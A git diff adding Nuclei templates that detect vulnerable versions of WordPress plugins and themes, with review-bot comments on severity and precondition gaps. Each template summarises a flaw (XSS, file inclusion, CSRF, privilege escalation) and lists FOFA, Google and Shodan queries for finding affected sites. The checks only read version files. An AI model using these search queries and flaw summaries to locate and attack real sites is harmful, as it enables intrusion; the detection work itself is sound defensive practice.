+ The ForumWP – Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘url’ parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd11abe3-8307-492b-beef-242fb21a4206?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11204
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:CVE-2024-11204'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml b/poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml
new file mode 100644
index 0000000000..52b63e4768
--- /dev/null
+++ b/poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3
+
+info:
+ name: >
+ PDF Builder for WooCommerce. Create invoices,packing slips and more <= 1.2.136 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The PDF Builder for WooCommerce. Create invoices,packing slips and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.2.136 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f21a86b-52f4-4563-afce-32f1949ce5a1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11276
+ metadata:
+ fofa-query: "wp-content/plugins/woo-pdf-invoice-builder/"
+ google-query: inurl:"/wp-content/plugins/woo-pdf-invoice-builder/"
+ shodan-query: 'vuln:CVE-2024-11276'
+ tags: cve,wordpress,wp-plugin,woo-pdf-invoice-builder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/woo-pdf-invoice-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woo-pdf-invoice-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.136')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml b/poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
new file mode 100644
index 0000000000..7de10ea86d
--- /dev/null
+++ b/poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb
+
+info:
+ name: >
+ Soledad <= 8.5.9 - Unauthenticated Limited Local File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+ The Soledad theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 8.5.9 via several functions like penci_archive_more_post_ajax_func, penci_more_post_ajax_func, and penci_more_featured_post_ajax_func. This makes it possible for unauthenticated attackers to include and execute PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included. The exploitability of this is limited to Windows.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/927674db-05f1-4f3b-8297-8a907955ea87?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-11289
+ metadata:
+ fofa-query: "wp-content/themes/soledad/"
+ google-query: inurl:"/wp-content/themes/soledad/"
+ shodan-query: 'vuln:CVE-2024-11289'
+ tags: cve,wordpress,wp-theme,soledad,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/soledad/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "soledad"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.5.9')
\ No newline at end of file
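Review bot: The description states that exploitability is limited to Windows, but nothing in the matchers looks at the host platform, so every Soledad install at or below 8.5.9 is reported with `severity: critical` regardless of where it runs. The only evidence used is the `Version:` line of `style.css`. I would record the precondition in the template, e.g. `# advisory limits exploitation to Windows hosts; confirm the server OS before escalating`, and reconsider the label given that `cvss-score` is 8.1 with `AC:H`.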
diff --git a/poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml b/poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml
new file mode 100644
index 0000000000..4590abad1d
--- /dev/null
+++ b/poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b
+
+info:
+ name: >
+ WP Private Content Plus <= 3.6.1 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Private Content Plus plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.1 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30c46b91-e371-480f-943a-3906d8b6bbba?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-11292
+ metadata:
+ fofa-query: "wp-content/plugins/wp-private-content-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-private-content-plus/"
+ shodan-query: 'vuln:CVE-2024-11292'
+ tags: cve,wordpress,wp-plugin,wp-private-content-plus,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-private-content-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-private-content-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml b/poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml
new file mode 100644
index 0000000000..9d9db1f1c3
--- /dev/null
+++ b/poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f
+
+info:
+ name: >
+ AI Quiz | Quiz Maker <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
+ author: topscoder
+ severity: low
+ description: >
+ The AI Quiz | Quiz Maker plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the ai_quiz_update_style() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-11323
+ metadata:
+ fofa-query: "wp-content/plugins/ai-quiz/"
+ google-query: inurl:"/wp-content/plugins/ai-quiz/"
+ shodan-query: 'vuln:CVE-2024-11323'
+ tags: cve,wordpress,wp-plugin,ai-quiz,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ai-quiz/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ai-quiz"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11324.yaml b/poc/cve/CVE-2024-11324.yaml
new file mode 100644
index 0000000000..1adfc3c928
--- /dev/null
+++ b/poc/cve/CVE-2024-11324.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11324
+
+info:
+ name: >
+ Accounting for WooCommerce <= 1.6.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f34b7518-5cb3-4b4e-8b18-927c08c045f7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11324
+ metadata:
+ fofa-query: "wp-content/plugins/accounting-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/accounting-for-woocommerce/"
+ shodan-query: 'vuln:CVE-2024-11324'
+ tags: cve,wordpress,wp-plugin,accounting-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accounting-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accounting-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml b/poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml
new file mode 100644
index 0000000000..eac6d981c0
--- /dev/null
+++ b/poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11336-3e061f8446314ee414179038a3da58ff
+
+info:
+ name: >
+ Clickbank WordPress Plugin (Storefront) <= 1.7 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Clickbank WordPress Plugin (Storefront) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7. This is due to missing or incorrect nonce validation via the cs_menu page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/57789905-1e08-41c5-bfda-b1d6d33de4c0?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11336
+ metadata:
+ fofa-query: "wp-content/plugins/clickbank-storefront/"
+ google-query: inurl:"/wp-content/plugins/clickbank-storefront/"
+ shodan-query: 'vuln:CVE-2024-11336'
+ tags: cve,wordpress,wp-plugin,clickbank-storefront,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clickbank-storefront/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clickbank-storefront"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7')
\ No newline at end of file
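Review bot: The `dsl` matcher treats the readme.txt `Stable tag` as the installed version, so a hit is a version inference and not a check of the nonce validation on cs_menu that the description refers to. A readme with `Stable tag: trunk` gives the regex nothing to capture, and a readme that lags the plugin header is compared against the wrong number. I would state this in the template with a comment above `http:`, e.g. `# Version inference only (readme.txt Stable tag); confirm the installed version before reporting.` The two extractors differ only in `internal: true` and share the name `version`; presumably one feeds the matcher and the other prints the value, which deserves a one-line comment too. The same request, extractor and matcher pattern repeats in the other new templates in this part of the diff (CVE-2024-11339 through CVE-2024-11730).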
diff --git a/poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml b/poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml
new file mode 100644
index 0000000000..2855a5dd63
--- /dev/null
+++ b/poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml
@@ -0,0 +1,60 @@
+id: CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1
+
+info:
+ name: >
+ Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's
+ 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e10f391a-6663-4222-8266-ab911c588b76?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11339
+ metadata:
+ fofa-query: "wp-content/plugins/smart-popup-blaster/"
+ google-query: inurl:"/wp-content/plugins/smart-popup-blaster/"
+ shodan-query: 'vuln:CVE-2024-11339'
+ tags: cve,wordpress,wp-plugin,smart-popup-blaster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-popup-blaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.3')
\ No newline at end of file
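Review bot: `severity: low` and the `low` tag disagree with the `cvss-score: 6.4` recorded under `classification`, which falls in the CVSS 3.1 medium band, so anyone filtering results by severity will under-rank this finding. If the generator deliberately downgrades issues that need a login, a comment such as `# severity lowered: requires contributor-level login` would make that visible; otherwise use `severity: medium` and the matching tag. The same mismatch appears in CVE-2024-11352, CVE-2024-11420 and CVE-2024-11450 (6.4 marked low), CVE-2024-11429 (8.8 marked low), and CVE-2024-11729 and CVE-2024-11730 (6.5 marked low). It runs the other way in CVE-2024-11460 and CVE-2024-11728 (7.5 marked critical).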
diff --git a/poc/cve/CVE-2024-11341.yaml b/poc/cve/CVE-2024-11341.yaml
new file mode 100644
index 0000000000..1b65d3b4dd
--- /dev/null
+++ b/poc/cve/CVE-2024-11341.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11341
+
+info:
+ name: >
+ Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
+ author: topscoder
+ severity: medium
+ description: >
+ The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fa84344-8672-43e1-a430-094021f7366f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-11341
+ metadata:
+ fofa-query: "wp-content/plugins/eelv-redirection/"
+ google-query: inurl:"/wp-content/plugins/eelv-redirection/"
+ shodan-query: 'vuln:CVE-2024-11341'
+ tags: cve,wordpress,wp-plugin,eelv-redirection,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/eelv-redirection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "eelv-redirection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml b/poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
new file mode 100644
index 0000000000..482b828121
--- /dev/null
+++ b/poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11352-2956a03392350547f722d5c5b1052818
+
+info:
+ name: >
+ TwentyTwenty <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The TwentyTwenty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'twentytwenty' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f805982-1141-4e28-b28c-93483646cf99?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11352
+ metadata:
+ fofa-query: "wp-content/plugins/twentytwenty/"
+ google-query: inurl:"/wp-content/plugins/twentytwenty/"
+ shodan-query: 'vuln:CVE-2024-11352'
+ tags: cve,wordpress,wp-plugin,twentytwenty,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/twentytwenty/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "twentytwenty"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml b/poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
new file mode 100644
index 0000000000..fe1357f9ad
--- /dev/null
+++ b/poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6
+
+info:
+ name: >
+ Splash Sync <= 2.0.6 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Splash Sync plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11368
+ metadata:
+ fofa-query: "wp-content/plugins/splash-connector/"
+ google-query: inurl:"/wp-content/plugins/splash-connector/"
+ shodan-query: 'vuln:CVE-2024-11368'
+ tags: cve,wordpress,wp-plugin,splash-connector,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/splash-connector/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "splash-connector"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml b/poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
new file mode 100644
index 0000000000..b8559ffe81
--- /dev/null
+++ b/poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc
+
+info:
+ name: >
+ Broadcast <= 51.01 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Broadcast plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'do_check' parameter in all versions up to, and including, 51.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11379
+ metadata:
+ fofa-query: "wp-content/plugins/threewp-broadcast/"
+ google-query: inurl:"/wp-content/plugins/threewp-broadcast/"
+ shodan-query: 'vuln:CVE-2024-11379'
+ tags: cve,wordpress,wp-plugin,threewp-broadcast,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/threewp-broadcast/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "threewp-broadcast"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 51.01')
\ No newline at end of file
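Review bot: The description limits this issue to multi-site installations, but the matchers only compare the readme.txt version, so a single-site install running Broadcast 51.01 or older is reported as well. Nothing in the request distinguishes the two cases, so I would state the limit where a triager sees it, for example a comment above `matchers:` reading `# Version match only; the issue applies to multisite installs, verify before reporting.`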
diff --git a/poc/cve/CVE-2024-11420.yaml b/poc/cve/CVE-2024-11420.yaml
new file mode 100644
index 0000000000..028d664068
--- /dev/null
+++ b/poc/cve/CVE-2024-11420.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11420
+
+info:
+ name: >
+ Blocksy <= 2.0.77 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Contact Info Block link parameter in all versions up to, and including, 2.0.77 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/02ad47d5-f011-4e0a-af29-088852d1e886?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11420
+ metadata:
+ fofa-query: "wp-content/themes/blocksy/"
+ google-query: inurl:"/wp-content/themes/blocksy/"
+ shodan-query: 'vuln:CVE-2024-11420'
+ tags: cve,wordpress,wp-theme,blocksy,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/blocksy/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "blocksy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.77')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11429.yaml b/poc/cve/CVE-2024-11429.yaml
new file mode 100644
index 0000000000..3266903b50
--- /dev/null
+++ b/poc/cve/CVE-2024-11429.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11429
+
+info:
+ name: >
+ Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials <= 3.3.3 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.
+ reference:
